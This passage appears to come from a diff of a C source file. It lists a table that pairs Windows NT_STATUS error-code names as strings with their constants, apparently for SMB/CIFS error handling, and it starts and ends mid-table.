+-	{"NT_STATUS_MEDIA_WRITE_PROTECTED",
+-	 NT_STATUS_MEDIA_WRITE_PROTECTED},
+-	{"NT_STATUS_DEVICE_NOT_READY", NT_STATUS_DEVICE_NOT_READY},
+-	{"NT_STATUS_INVALID_GROUP_ATTRIBUTES",
+-	 NT_STATUS_INVALID_GROUP_ATTRIBUTES},
+-	{"NT_STATUS_BAD_IMPERSONATION_LEVEL",
+-	 NT_STATUS_BAD_IMPERSONATION_LEVEL},
+-	{"NT_STATUS_CANT_OPEN_ANONYMOUS", NT_STATUS_CANT_OPEN_ANONYMOUS},
+-	{"NT_STATUS_BAD_VALIDATION_CLASS", NT_STATUS_BAD_VALIDATION_CLASS},
+-	{"NT_STATUS_BAD_TOKEN_TYPE", NT_STATUS_BAD_TOKEN_TYPE},
+-	{"NT_STATUS_BAD_MASTER_BOOT_RECORD",
+-	 NT_STATUS_BAD_MASTER_BOOT_RECORD},
+-	{"NT_STATUS_INSTRUCTION_MISALIGNMENT",
+-	 NT_STATUS_INSTRUCTION_MISALIGNMENT},
+-	{"NT_STATUS_INSTANCE_NOT_AVAILABLE",
+-	 NT_STATUS_INSTANCE_NOT_AVAILABLE},
+-	{"NT_STATUS_PIPE_NOT_AVAILABLE", NT_STATUS_PIPE_NOT_AVAILABLE},
+-	{"NT_STATUS_INVALID_PIPE_STATE", NT_STATUS_INVALID_PIPE_STATE},
+-	{"NT_STATUS_PIPE_BUSY", NT_STATUS_PIPE_BUSY},
+-	{"NT_STATUS_ILLEGAL_FUNCTION", NT_STATUS_ILLEGAL_FUNCTION},
+-	{"NT_STATUS_PIPE_DISCONNECTED", NT_STATUS_PIPE_DISCONNECTED},
+-	{"NT_STATUS_PIPE_CLOSING", NT_STATUS_PIPE_CLOSING},
+-	{"NT_STATUS_PIPE_CONNECTED", NT_STATUS_PIPE_CONNECTED},
+-	{"NT_STATUS_PIPE_LISTENING", NT_STATUS_PIPE_LISTENING},
+-	{"NT_STATUS_INVALID_READ_MODE", NT_STATUS_INVALID_READ_MODE},
+-	{"NT_STATUS_IO_TIMEOUT", NT_STATUS_IO_TIMEOUT},
+-	{"NT_STATUS_FILE_FORCED_CLOSED", NT_STATUS_FILE_FORCED_CLOSED},
+-	{"NT_STATUS_PROFILING_NOT_STARTED",
+-	 NT_STATUS_PROFILING_NOT_STARTED},
+-	{"NT_STATUS_PROFILING_NOT_STOPPED",
+-	 NT_STATUS_PROFILING_NOT_STOPPED},
+-	{"NT_STATUS_COULD_NOT_INTERPRET", NT_STATUS_COULD_NOT_INTERPRET},
+-	{"NT_STATUS_FILE_IS_A_DIRECTORY", NT_STATUS_FILE_IS_A_DIRECTORY},
+-	{"NT_STATUS_NOT_SUPPORTED", NT_STATUS_NOT_SUPPORTED},
+-	{"NT_STATUS_REMOTE_NOT_LISTENING", NT_STATUS_REMOTE_NOT_LISTENING},
+-	{"NT_STATUS_DUPLICATE_NAME", NT_STATUS_DUPLICATE_NAME},
+-	{"NT_STATUS_BAD_NETWORK_PATH", NT_STATUS_BAD_NETWORK_PATH},
+-	{"NT_STATUS_NETWORK_BUSY", NT_STATUS_NETWORK_BUSY},
+-	{"NT_STATUS_DEVICE_DOES_NOT_EXIST",
+-	 NT_STATUS_DEVICE_DOES_NOT_EXIST},
+-	{"NT_STATUS_TOO_MANY_COMMANDS", NT_STATUS_TOO_MANY_COMMANDS},
+-	{"NT_STATUS_ADAPTER_HARDWARE_ERROR",
+-	 NT_STATUS_ADAPTER_HARDWARE_ERROR},
+-	{"NT_STATUS_INVALID_NETWORK_RESPONSE",
+-	 NT_STATUS_INVALID_NETWORK_RESPONSE},
+-	{"NT_STATUS_UNEXPECTED_NETWORK_ERROR",
+-	 NT_STATUS_UNEXPECTED_NETWORK_ERROR},
+-	{"NT_STATUS_BAD_REMOTE_ADAPTER", NT_STATUS_BAD_REMOTE_ADAPTER},
+-	{"NT_STATUS_PRINT_QUEUE_FULL", NT_STATUS_PRINT_QUEUE_FULL},
+-	{"NT_STATUS_NO_SPOOL_SPACE", NT_STATUS_NO_SPOOL_SPACE},
+-	{"NT_STATUS_PRINT_CANCELLED", NT_STATUS_PRINT_CANCELLED},
+-	{"NT_STATUS_NETWORK_NAME_DELETED", NT_STATUS_NETWORK_NAME_DELETED},
+-	{"NT_STATUS_NETWORK_ACCESS_DENIED",
+-	 NT_STATUS_NETWORK_ACCESS_DENIED},
+-	{"NT_STATUS_BAD_DEVICE_TYPE", NT_STATUS_BAD_DEVICE_TYPE},
+-	{"NT_STATUS_BAD_NETWORK_NAME", NT_STATUS_BAD_NETWORK_NAME},
+-	{"NT_STATUS_TOO_MANY_NAMES", NT_STATUS_TOO_MANY_NAMES},
+-	{"NT_STATUS_TOO_MANY_SESSIONS", NT_STATUS_TOO_MANY_SESSIONS},
+-	{"NT_STATUS_SHARING_PAUSED", NT_STATUS_SHARING_PAUSED},
+-	{"NT_STATUS_REQUEST_NOT_ACCEPTED", NT_STATUS_REQUEST_NOT_ACCEPTED},
+-	{"NT_STATUS_REDIRECTOR_PAUSED", NT_STATUS_REDIRECTOR_PAUSED},
+-	{"NT_STATUS_NET_WRITE_FAULT", NT_STATUS_NET_WRITE_FAULT},
+-	{"NT_STATUS_PROFILING_AT_LIMIT", NT_STATUS_PROFILING_AT_LIMIT},
+-	{"NT_STATUS_NOT_SAME_DEVICE", NT_STATUS_NOT_SAME_DEVICE},
+-	{"NT_STATUS_FILE_RENAMED", NT_STATUS_FILE_RENAMED},
+-	{"NT_STATUS_VIRTUAL_CIRCUIT_CLOSED",
+-	 NT_STATUS_VIRTUAL_CIRCUIT_CLOSED},
+-	{"NT_STATUS_NO_SECURITY_ON_OBJECT",
+-	 NT_STATUS_NO_SECURITY_ON_OBJECT},
+-	{"NT_STATUS_CANT_WAIT", NT_STATUS_CANT_WAIT},
+-	{"NT_STATUS_PIPE_EMPTY", NT_STATUS_PIPE_EMPTY},
+-	{"NT_STATUS_CANT_ACCESS_DOMAIN_INFO",
+-	 NT_STATUS_CANT_ACCESS_DOMAIN_INFO},
+-	{"NT_STATUS_CANT_TERMINATE_SELF", NT_STATUS_CANT_TERMINATE_SELF},
+-	{"NT_STATUS_INVALID_SERVER_STATE", NT_STATUS_INVALID_SERVER_STATE},
+-	{"NT_STATUS_INVALID_DOMAIN_STATE", NT_STATUS_INVALID_DOMAIN_STATE},
+-	{"NT_STATUS_INVALID_DOMAIN_ROLE", NT_STATUS_INVALID_DOMAIN_ROLE},
+-	{"NT_STATUS_NO_SUCH_DOMAIN", NT_STATUS_NO_SUCH_DOMAIN},
+-	{"NT_STATUS_DOMAIN_EXISTS", NT_STATUS_DOMAIN_EXISTS},
+-	{"NT_STATUS_DOMAIN_LIMIT_EXCEEDED",
+-	 NT_STATUS_DOMAIN_LIMIT_EXCEEDED},
+-	{"NT_STATUS_OPLOCK_NOT_GRANTED", NT_STATUS_OPLOCK_NOT_GRANTED},
+-	{"NT_STATUS_INVALID_OPLOCK_PROTOCOL",
+-	 NT_STATUS_INVALID_OPLOCK_PROTOCOL},
+-	{"NT_STATUS_INTERNAL_DB_CORRUPTION",
+-	 NT_STATUS_INTERNAL_DB_CORRUPTION},
+-	{"NT_STATUS_INTERNAL_ERROR", NT_STATUS_INTERNAL_ERROR},
+-	{"NT_STATUS_GENERIC_NOT_MAPPED", NT_STATUS_GENERIC_NOT_MAPPED},
+-	{"NT_STATUS_BAD_DESCRIPTOR_FORMAT",
+-	 NT_STATUS_BAD_DESCRIPTOR_FORMAT},
+-	{"NT_STATUS_INVALID_USER_BUFFER", NT_STATUS_INVALID_USER_BUFFER},
+-	{"NT_STATUS_UNEXPECTED_IO_ERROR", NT_STATUS_UNEXPECTED_IO_ERROR},
+-	{"NT_STATUS_UNEXPECTED_MM_CREATE_ERR",
+-	 NT_STATUS_UNEXPECTED_MM_CREATE_ERR},
+-	{"NT_STATUS_UNEXPECTED_MM_MAP_ERROR",
+-	 NT_STATUS_UNEXPECTED_MM_MAP_ERROR},
+-	{"NT_STATUS_UNEXPECTED_MM_EXTEND_ERR",
+-	 NT_STATUS_UNEXPECTED_MM_EXTEND_ERR},
+-	{"NT_STATUS_NOT_LOGON_PROCESS", NT_STATUS_NOT_LOGON_PROCESS},
+-	{"NT_STATUS_LOGON_SESSION_EXISTS", NT_STATUS_LOGON_SESSION_EXISTS},
+-	{"NT_STATUS_INVALID_PARAMETER_1", NT_STATUS_INVALID_PARAMETER_1},
+-	{"NT_STATUS_INVALID_PARAMETER_2", NT_STATUS_INVALID_PARAMETER_2},
+-	{"NT_STATUS_INVALID_PARAMETER_3", NT_STATUS_INVALID_PARAMETER_3},
+-	{"NT_STATUS_INVALID_PARAMETER_4", NT_STATUS_INVALID_PARAMETER_4},
+-	{"NT_STATUS_INVALID_PARAMETER_5", NT_STATUS_INVALID_PARAMETER_5},
+-	{"NT_STATUS_INVALID_PARAMETER_6", NT_STATUS_INVALID_PARAMETER_6},
+-	{"NT_STATUS_INVALID_PARAMETER_7", NT_STATUS_INVALID_PARAMETER_7},
+-	{"NT_STATUS_INVALID_PARAMETER_8", NT_STATUS_INVALID_PARAMETER_8},
+-	{"NT_STATUS_INVALID_PARAMETER_9", NT_STATUS_INVALID_PARAMETER_9},
+-	{"NT_STATUS_INVALID_PARAMETER_10", NT_STATUS_INVALID_PARAMETER_10},
+-	{"NT_STATUS_INVALID_PARAMETER_11", NT_STATUS_INVALID_PARAMETER_11},
+-	{"NT_STATUS_INVALID_PARAMETER_12", NT_STATUS_INVALID_PARAMETER_12},
+-	{"NT_STATUS_REDIRECTOR_NOT_STARTED",
+-	 NT_STATUS_REDIRECTOR_NOT_STARTED},
+-	{"NT_STATUS_REDIRECTOR_STARTED", NT_STATUS_REDIRECTOR_STARTED},
+-	{"NT_STATUS_STACK_OVERFLOW", NT_STATUS_STACK_OVERFLOW},
+-	{"NT_STATUS_NO_SUCH_PACKAGE", NT_STATUS_NO_SUCH_PACKAGE},
+-	{"NT_STATUS_BAD_FUNCTION_TABLE", NT_STATUS_BAD_FUNCTION_TABLE},
+-	{"NT_STATUS_DIRECTORY_NOT_EMPTY", NT_STATUS_DIRECTORY_NOT_EMPTY},
+-	{"NT_STATUS_FILE_CORRUPT_ERROR", NT_STATUS_FILE_CORRUPT_ERROR},
+-	{"NT_STATUS_NOT_A_DIRECTORY", NT_STATUS_NOT_A_DIRECTORY},
+-	{"NT_STATUS_BAD_LOGON_SESSION_STATE",
+-	 NT_STATUS_BAD_LOGON_SESSION_STATE},
+-	{"NT_STATUS_LOGON_SESSION_COLLISION",
+-	 NT_STATUS_LOGON_SESSION_COLLISION},
+-	{"NT_STATUS_NAME_TOO_LONG", NT_STATUS_NAME_TOO_LONG},
+-	{"NT_STATUS_FILES_OPEN", NT_STATUS_FILES_OPEN},
+-	{"NT_STATUS_CONNECTION_IN_USE", NT_STATUS_CONNECTION_IN_USE},
+-	{"NT_STATUS_MESSAGE_NOT_FOUND", NT_STATUS_MESSAGE_NOT_FOUND},
+-	{"NT_STATUS_PROCESS_IS_TERMINATING",
+-	 NT_STATUS_PROCESS_IS_TERMINATING},
+-	{"NT_STATUS_INVALID_LOGON_TYPE", NT_STATUS_INVALID_LOGON_TYPE},
+-	{"NT_STATUS_NO_GUID_TRANSLATION", NT_STATUS_NO_GUID_TRANSLATION},
+-	{"NT_STATUS_CANNOT_IMPERSONATE", NT_STATUS_CANNOT_IMPERSONATE},
+-	{"NT_STATUS_IMAGE_ALREADY_LOADED", NT_STATUS_IMAGE_ALREADY_LOADED},
+-	{"NT_STATUS_ABIOS_NOT_PRESENT", NT_STATUS_ABIOS_NOT_PRESENT},
+-	{"NT_STATUS_ABIOS_LID_NOT_EXIST", NT_STATUS_ABIOS_LID_NOT_EXIST},
+-	{"NT_STATUS_ABIOS_LID_ALREADY_OWNED",
+-	 NT_STATUS_ABIOS_LID_ALREADY_OWNED},
+-	{"NT_STATUS_ABIOS_NOT_LID_OWNER", NT_STATUS_ABIOS_NOT_LID_OWNER},
+-	{"NT_STATUS_ABIOS_INVALID_COMMAND",
+-	 NT_STATUS_ABIOS_INVALID_COMMAND},
+-	{"NT_STATUS_ABIOS_INVALID_LID", NT_STATUS_ABIOS_INVALID_LID},
+-	{"NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE",
+-	 NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE},
+-	{"NT_STATUS_ABIOS_INVALID_SELECTOR",
+-	 NT_STATUS_ABIOS_INVALID_SELECTOR},
+-	{"NT_STATUS_NO_LDT", NT_STATUS_NO_LDT},
+-	{"NT_STATUS_INVALID_LDT_SIZE", NT_STATUS_INVALID_LDT_SIZE},
+-	{"NT_STATUS_INVALID_LDT_OFFSET", NT_STATUS_INVALID_LDT_OFFSET},
+-	{"NT_STATUS_INVALID_LDT_DESCRIPTOR",
+-	 NT_STATUS_INVALID_LDT_DESCRIPTOR},
+-	{"NT_STATUS_INVALID_IMAGE_NE_FORMAT",
+-	 NT_STATUS_INVALID_IMAGE_NE_FORMAT},
+-	{"NT_STATUS_RXACT_INVALID_STATE", NT_STATUS_RXACT_INVALID_STATE},
+-	{"NT_STATUS_RXACT_COMMIT_FAILURE", NT_STATUS_RXACT_COMMIT_FAILURE},
+-	{"NT_STATUS_MAPPED_FILE_SIZE_ZERO",
+-	 NT_STATUS_MAPPED_FILE_SIZE_ZERO},
+-	{"NT_STATUS_TOO_MANY_OPENED_FILES",
+-	 NT_STATUS_TOO_MANY_OPENED_FILES},
+-	{"NT_STATUS_CANCELLED", NT_STATUS_CANCELLED},
+-	{"NT_STATUS_CANNOT_DELETE", NT_STATUS_CANNOT_DELETE},
+-	{"NT_STATUS_INVALID_COMPUTER_NAME",
+-	 NT_STATUS_INVALID_COMPUTER_NAME},
+-	{"NT_STATUS_FILE_DELETED", NT_STATUS_FILE_DELETED},
+-	{"NT_STATUS_SPECIAL_ACCOUNT", NT_STATUS_SPECIAL_ACCOUNT},
+-	{"NT_STATUS_SPECIAL_GROUP", NT_STATUS_SPECIAL_GROUP},
+-	{"NT_STATUS_SPECIAL_USER", NT_STATUS_SPECIAL_USER},
+-	{"NT_STATUS_MEMBERS_PRIMARY_GROUP",
+-	 NT_STATUS_MEMBERS_PRIMARY_GROUP},
+-	{"NT_STATUS_FILE_CLOSED", NT_STATUS_FILE_CLOSED},
+-	{"NT_STATUS_TOO_MANY_THREADS", NT_STATUS_TOO_MANY_THREADS},
+-	{"NT_STATUS_THREAD_NOT_IN_PROCESS",
+-	 NT_STATUS_THREAD_NOT_IN_PROCESS},
+-	{"NT_STATUS_TOKEN_ALREADY_IN_USE", NT_STATUS_TOKEN_ALREADY_IN_USE},
+-	{"NT_STATUS_PAGEFILE_QUOTA_EXCEEDED",
+-	 NT_STATUS_PAGEFILE_QUOTA_EXCEEDED},
+-	{"NT_STATUS_COMMITMENT_LIMIT", NT_STATUS_COMMITMENT_LIMIT},
+-	{"NT_STATUS_INVALID_IMAGE_LE_FORMAT",
+-	 NT_STATUS_INVALID_IMAGE_LE_FORMAT},
+-	{"NT_STATUS_INVALID_IMAGE_NOT_MZ", NT_STATUS_INVALID_IMAGE_NOT_MZ},
+-	{"NT_STATUS_INVALID_IMAGE_PROTECT",
+-	 NT_STATUS_INVALID_IMAGE_PROTECT},
+-	{"NT_STATUS_INVALID_IMAGE_WIN_16", NT_STATUS_INVALID_IMAGE_WIN_16},
+-	{"NT_STATUS_LOGON_SERVER_CONFLICT",
+-	 NT_STATUS_LOGON_SERVER_CONFLICT},
+-	{"NT_STATUS_TIME_DIFFERENCE_AT_DC",
+-	 NT_STATUS_TIME_DIFFERENCE_AT_DC},
+-	{"NT_STATUS_SYNCHRONIZATION_REQUIRED",
+-	 NT_STATUS_SYNCHRONIZATION_REQUIRED},
+-	{"NT_STATUS_DLL_NOT_FOUND", NT_STATUS_DLL_NOT_FOUND},
+-	{"NT_STATUS_OPEN_FAILED", NT_STATUS_OPEN_FAILED},
+-	{"NT_STATUS_IO_PRIVILEGE_FAILED", NT_STATUS_IO_PRIVILEGE_FAILED},
+-	{"NT_STATUS_ORDINAL_NOT_FOUND", NT_STATUS_ORDINAL_NOT_FOUND},
+-	{"NT_STATUS_ENTRYPOINT_NOT_FOUND", NT_STATUS_ENTRYPOINT_NOT_FOUND},
+-	{"NT_STATUS_CONTROL_C_EXIT", NT_STATUS_CONTROL_C_EXIT},
+-	{"NT_STATUS_LOCAL_DISCONNECT", NT_STATUS_LOCAL_DISCONNECT},
+-	{"NT_STATUS_REMOTE_DISCONNECT", NT_STATUS_REMOTE_DISCONNECT},
+-	{"NT_STATUS_REMOTE_RESOURCES", NT_STATUS_REMOTE_RESOURCES},
+-	{"NT_STATUS_LINK_FAILED", NT_STATUS_LINK_FAILED},
+-	{"NT_STATUS_LINK_TIMEOUT", NT_STATUS_LINK_TIMEOUT},
+-	{"NT_STATUS_INVALID_CONNECTION", NT_STATUS_INVALID_CONNECTION},
+-	{"NT_STATUS_INVALID_ADDRESS", NT_STATUS_INVALID_ADDRESS},
+-	{"NT_STATUS_DLL_INIT_FAILED", NT_STATUS_DLL_INIT_FAILED},
+-	{"NT_STATUS_MISSING_SYSTEMFILE", NT_STATUS_MISSING_SYSTEMFILE},
+-	{"NT_STATUS_UNHANDLED_EXCEPTION", NT_STATUS_UNHANDLED_EXCEPTION},
+-	{"NT_STATUS_APP_INIT_FAILURE", NT_STATUS_APP_INIT_FAILURE},
+-	{"NT_STATUS_PAGEFILE_CREATE_FAILED",
+-	 NT_STATUS_PAGEFILE_CREATE_FAILED},
+-	{"NT_STATUS_NO_PAGEFILE", NT_STATUS_NO_PAGEFILE},
+-	{"NT_STATUS_INVALID_LEVEL", NT_STATUS_INVALID_LEVEL},
+-	{"NT_STATUS_WRONG_PASSWORD_CORE", NT_STATUS_WRONG_PASSWORD_CORE},
+-	{"NT_STATUS_ILLEGAL_FLOAT_CONTEXT",
+-	 NT_STATUS_ILLEGAL_FLOAT_CONTEXT},
+-	{"NT_STATUS_PIPE_BROKEN", NT_STATUS_PIPE_BROKEN},
+-	{"NT_STATUS_REGISTRY_CORRUPT", NT_STATUS_REGISTRY_CORRUPT},
+-	{"NT_STATUS_REGISTRY_IO_FAILED", NT_STATUS_REGISTRY_IO_FAILED},
+-	{"NT_STATUS_NO_EVENT_PAIR", NT_STATUS_NO_EVENT_PAIR},
+-	{"NT_STATUS_UNRECOGNIZED_VOLUME", NT_STATUS_UNRECOGNIZED_VOLUME},
+-	{"NT_STATUS_SERIAL_NO_DEVICE_INITED",
+-	 NT_STATUS_SERIAL_NO_DEVICE_INITED},
+-	{"NT_STATUS_NO_SUCH_ALIAS", NT_STATUS_NO_SUCH_ALIAS},
+-	{"NT_STATUS_MEMBER_NOT_IN_ALIAS", NT_STATUS_MEMBER_NOT_IN_ALIAS},
+-	{"NT_STATUS_MEMBER_IN_ALIAS", NT_STATUS_MEMBER_IN_ALIAS},
+-	{"NT_STATUS_ALIAS_EXISTS", NT_STATUS_ALIAS_EXISTS},
+-	{"NT_STATUS_LOGON_NOT_GRANTED", NT_STATUS_LOGON_NOT_GRANTED},
+-	{"NT_STATUS_TOO_MANY_SECRETS", NT_STATUS_TOO_MANY_SECRETS},
+-	{"NT_STATUS_SECRET_TOO_LONG", NT_STATUS_SECRET_TOO_LONG},
+-	{"NT_STATUS_INTERNAL_DB_ERROR", NT_STATUS_INTERNAL_DB_ERROR},
+-	{"NT_STATUS_FULLSCREEN_MODE", NT_STATUS_FULLSCREEN_MODE},
+-	{"NT_STATUS_TOO_MANY_CONTEXT_IDS", NT_STATUS_TOO_MANY_CONTEXT_IDS},
+-	{"NT_STATUS_LOGON_TYPE_NOT_GRANTED",
+-	 NT_STATUS_LOGON_TYPE_NOT_GRANTED},
+-	{"NT_STATUS_NOT_REGISTRY_FILE", NT_STATUS_NOT_REGISTRY_FILE},
+-	{"NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED",
+-	 NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED},
+-	{"NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR",
+-	 NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR},
+-	{"NT_STATUS_FT_MISSING_MEMBER", NT_STATUS_FT_MISSING_MEMBER},
+-	{"NT_STATUS_ILL_FORMED_SERVICE_ENTRY",
+-	 NT_STATUS_ILL_FORMED_SERVICE_ENTRY},
+-	{"NT_STATUS_ILLEGAL_CHARACTER", NT_STATUS_ILLEGAL_CHARACTER},
+-	{"NT_STATUS_UNMAPPABLE_CHARACTER", NT_STATUS_UNMAPPABLE_CHARACTER},
+-	{"NT_STATUS_UNDEFINED_CHARACTER", NT_STATUS_UNDEFINED_CHARACTER},
+-	{"NT_STATUS_FLOPPY_VOLUME", NT_STATUS_FLOPPY_VOLUME},
+-	{"NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND",
+-	 NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND},
+-	{"NT_STATUS_FLOPPY_WRONG_CYLINDER",
+-	 NT_STATUS_FLOPPY_WRONG_CYLINDER},
+-	{"NT_STATUS_FLOPPY_UNKNOWN_ERROR", NT_STATUS_FLOPPY_UNKNOWN_ERROR},
+-	{"NT_STATUS_FLOPPY_BAD_REGISTERS", NT_STATUS_FLOPPY_BAD_REGISTERS},
+-	{"NT_STATUS_DISK_RECALIBRATE_FAILED",
+-	 NT_STATUS_DISK_RECALIBRATE_FAILED},
+-	{"NT_STATUS_DISK_OPERATION_FAILED",
+-	 NT_STATUS_DISK_OPERATION_FAILED},
+-	{"NT_STATUS_DISK_RESET_FAILED", NT_STATUS_DISK_RESET_FAILED},
+-	{"NT_STATUS_SHARED_IRQ_BUSY", NT_STATUS_SHARED_IRQ_BUSY},
+-	{"NT_STATUS_FT_ORPHANING", NT_STATUS_FT_ORPHANING},
+-	{"NT_STATUS_PARTITION_FAILURE", NT_STATUS_PARTITION_FAILURE},
+-	{"NT_STATUS_INVALID_BLOCK_LENGTH", NT_STATUS_INVALID_BLOCK_LENGTH},
+-	{"NT_STATUS_DEVICE_NOT_PARTITIONED",
+-	 NT_STATUS_DEVICE_NOT_PARTITIONED},
+-	{"NT_STATUS_UNABLE_TO_LOCK_MEDIA", NT_STATUS_UNABLE_TO_LOCK_MEDIA},
+-	{"NT_STATUS_UNABLE_TO_UNLOAD_MEDIA",
+-	 NT_STATUS_UNABLE_TO_UNLOAD_MEDIA},
+-	{"NT_STATUS_EOM_OVERFLOW", NT_STATUS_EOM_OVERFLOW},
+-	{"NT_STATUS_NO_MEDIA", NT_STATUS_NO_MEDIA},
+-	{"NT_STATUS_NO_SUCH_MEMBER", NT_STATUS_NO_SUCH_MEMBER},
+-	{"NT_STATUS_INVALID_MEMBER", NT_STATUS_INVALID_MEMBER},
+-	{"NT_STATUS_KEY_DELETED", NT_STATUS_KEY_DELETED},
+-	{"NT_STATUS_NO_LOG_SPACE", NT_STATUS_NO_LOG_SPACE},
+-	{"NT_STATUS_TOO_MANY_SIDS", NT_STATUS_TOO_MANY_SIDS},
+-	{"NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED",
+-	 NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED},
+-	{"NT_STATUS_KEY_HAS_CHILDREN", NT_STATUS_KEY_HAS_CHILDREN},
+-	{"NT_STATUS_CHILD_MUST_BE_VOLATILE",
+-	 NT_STATUS_CHILD_MUST_BE_VOLATILE},
+-	{"NT_STATUS_DEVICE_CONFIGURATION_ERROR",
+-	 NT_STATUS_DEVICE_CONFIGURATION_ERROR},
+-	{"NT_STATUS_DRIVER_INTERNAL_ERROR",
+-	 NT_STATUS_DRIVER_INTERNAL_ERROR},
+-	{"NT_STATUS_INVALID_DEVICE_STATE", NT_STATUS_INVALID_DEVICE_STATE},
+-	{"NT_STATUS_IO_DEVICE_ERROR", NT_STATUS_IO_DEVICE_ERROR},
+-	{"NT_STATUS_DEVICE_PROTOCOL_ERROR",
+-	 NT_STATUS_DEVICE_PROTOCOL_ERROR},
+-	{"NT_STATUS_BACKUP_CONTROLLER", NT_STATUS_BACKUP_CONTROLLER},
+-	{"NT_STATUS_LOG_FILE_FULL", NT_STATUS_LOG_FILE_FULL},
+-	{"NT_STATUS_TOO_LATE", NT_STATUS_TOO_LATE},
+-	{"NT_STATUS_NO_TRUST_LSA_SECRET", NT_STATUS_NO_TRUST_LSA_SECRET},
+-	{"NT_STATUS_NO_TRUST_SAM_ACCOUNT", NT_STATUS_NO_TRUST_SAM_ACCOUNT},
+-	{"NT_STATUS_TRUSTED_DOMAIN_FAILURE",
+-	 NT_STATUS_TRUSTED_DOMAIN_FAILURE},
+-	{"NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE",
+-	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE},
+-	{"NT_STATUS_EVENTLOG_FILE_CORRUPT",
+-	 NT_STATUS_EVENTLOG_FILE_CORRUPT},
+-	{"NT_STATUS_EVENTLOG_CANT_START", NT_STATUS_EVENTLOG_CANT_START},
+-	{"NT_STATUS_TRUST_FAILURE", NT_STATUS_TRUST_FAILURE},
+-	{"NT_STATUS_MUTANT_LIMIT_EXCEEDED",
+-	 NT_STATUS_MUTANT_LIMIT_EXCEEDED},
+-	{"NT_STATUS_NETLOGON_NOT_STARTED", NT_STATUS_NETLOGON_NOT_STARTED},
+-	{"NT_STATUS_ACCOUNT_EXPIRED", NT_STATUS_ACCOUNT_EXPIRED},
+-	{"NT_STATUS_POSSIBLE_DEADLOCK", NT_STATUS_POSSIBLE_DEADLOCK},
+-	{"NT_STATUS_NETWORK_CREDENTIAL_CONFLICT",
+-	 NT_STATUS_NETWORK_CREDENTIAL_CONFLICT},
+-	{"NT_STATUS_REMOTE_SESSION_LIMIT", NT_STATUS_REMOTE_SESSION_LIMIT},
+-	{"NT_STATUS_EVENTLOG_FILE_CHANGED",
+-	 NT_STATUS_EVENTLOG_FILE_CHANGED},
+-	{"NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT},
+-	{"NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT},
+-	{"NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
+-	{"NT_STATUS_DOMAIN_TRUST_INCONSISTENT",
+-	 NT_STATUS_DOMAIN_TRUST_INCONSISTENT},
+-	{"NT_STATUS_FS_DRIVER_REQUIRED", NT_STATUS_FS_DRIVER_REQUIRED},
+-	{"NT_STATUS_NO_USER_SESSION_KEY", NT_STATUS_NO_USER_SESSION_KEY},
+-	{"NT_STATUS_USER_SESSION_DELETED", NT_STATUS_USER_SESSION_DELETED},
+-	{"NT_STATUS_RESOURCE_LANG_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_LANG_NOT_FOUND},
+-	{"NT_STATUS_INSUFF_SERVER_RESOURCES",
+-	 NT_STATUS_INSUFF_SERVER_RESOURCES},
+-	{"NT_STATUS_INVALID_BUFFER_SIZE", NT_STATUS_INVALID_BUFFER_SIZE},
+-	{"NT_STATUS_INVALID_ADDRESS_COMPONENT",
+-	 NT_STATUS_INVALID_ADDRESS_COMPONENT},
+-	{"NT_STATUS_INVALID_ADDRESS_WILDCARD",
+-	 NT_STATUS_INVALID_ADDRESS_WILDCARD},
+-	{"NT_STATUS_TOO_MANY_ADDRESSES", NT_STATUS_TOO_MANY_ADDRESSES},
+-	{"NT_STATUS_ADDRESS_ALREADY_EXISTS",
+-	 NT_STATUS_ADDRESS_ALREADY_EXISTS},
+-	{"NT_STATUS_ADDRESS_CLOSED", NT_STATUS_ADDRESS_CLOSED},
+-	{"NT_STATUS_CONNECTION_DISCONNECTED",
+-	 NT_STATUS_CONNECTION_DISCONNECTED},
+-	{"NT_STATUS_CONNECTION_RESET", NT_STATUS_CONNECTION_RESET},
+-	{"NT_STATUS_TOO_MANY_NODES", NT_STATUS_TOO_MANY_NODES},
+-	{"NT_STATUS_TRANSACTION_ABORTED", NT_STATUS_TRANSACTION_ABORTED},
+-	{"NT_STATUS_TRANSACTION_TIMED_OUT",
+-	 NT_STATUS_TRANSACTION_TIMED_OUT},
+-	{"NT_STATUS_TRANSACTION_NO_RELEASE",
+-	 NT_STATUS_TRANSACTION_NO_RELEASE},
+-	{"NT_STATUS_TRANSACTION_NO_MATCH", NT_STATUS_TRANSACTION_NO_MATCH},
+-	{"NT_STATUS_TRANSACTION_RESPONDED",
+-	 NT_STATUS_TRANSACTION_RESPONDED},
+-	{"NT_STATUS_TRANSACTION_INVALID_ID",
+-	 NT_STATUS_TRANSACTION_INVALID_ID},
+-	{"NT_STATUS_TRANSACTION_INVALID_TYPE",
+-	 NT_STATUS_TRANSACTION_INVALID_TYPE},
+-	{"NT_STATUS_NOT_SERVER_SESSION", NT_STATUS_NOT_SERVER_SESSION},
+-	{"NT_STATUS_NOT_CLIENT_SESSION", NT_STATUS_NOT_CLIENT_SESSION},
+-	{"NT_STATUS_CANNOT_LOAD_REGISTRY_FILE",
+-	 NT_STATUS_CANNOT_LOAD_REGISTRY_FILE},
+-	{"NT_STATUS_DEBUG_ATTACH_FAILED", NT_STATUS_DEBUG_ATTACH_FAILED},
+-	{"NT_STATUS_SYSTEM_PROCESS_TERMINATED",
+-	 NT_STATUS_SYSTEM_PROCESS_TERMINATED},
+-	{"NT_STATUS_DATA_NOT_ACCEPTED", NT_STATUS_DATA_NOT_ACCEPTED},
+-	{"NT_STATUS_NO_BROWSER_SERVERS_FOUND",
